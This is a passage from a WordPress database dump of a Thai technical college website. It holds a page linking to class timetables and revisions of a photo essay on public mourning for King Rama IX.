(4396, 4, '2018-11-12 14:48:31', '2018-11-12 07:48:31', '<h3><span style=\"color: #993366;\">ตารางสอนครู</span></h3>\r\n<a href=\"https://drive.google.com/open?id=1wFlgoyeoS1Pg-zSFQB0W7cjDuALXZwMR\">ปีการศึกษา 1/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1s5ZqbV0gwdItaOdkYYP3lDPxM3v28r9D?usp=sharing\">ปีการศึกษา 2/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1edMX3D9uKF7qxQXyo1e8KOtKSceRl8DJ?usp=sharing\">ปีการศึกษา 1/2561</a>\r\n\r\nปีการศึกษา 2/2561\r\n\r\n \r\n<h3><span style=\"color: #993366;\">ตารางเรียนนักเรียน-นักศึกษา</span></h3>\r\nปีการศึกษา 1/2560\r\n\r\nปีการศึกษา 2/2560\r\n\r\n<a href=\"https://drive.google.com/drive/folders/112Qd4zzmPkHhMeDj_tGi4vbUbo3YVPnx?usp=sharing\">ปีการศึกษา 1/2561</a>\r\n\r\nปีการศึกษา 2/2561', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-11-12 14:48:31', '2018-11-12 07:48:31', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(4397, 3, '2018-11-12 14:52:50', '2018-11-12 07:52:50', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษร</p>\r\n<p style=\"text-align: center;\">เป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:52:50', '2018-11-12 07:52:50', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4398, 3, '2018-11-12 14:54:27', '2018-11-12 07:54:27', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษร</p>\r\n<p style=\"text-align: center;\">เป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง</p>\r\n<p style=\"text-align: center;\">เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไป</p>\r\n<p style=\"text-align: center;\">ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชน</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" 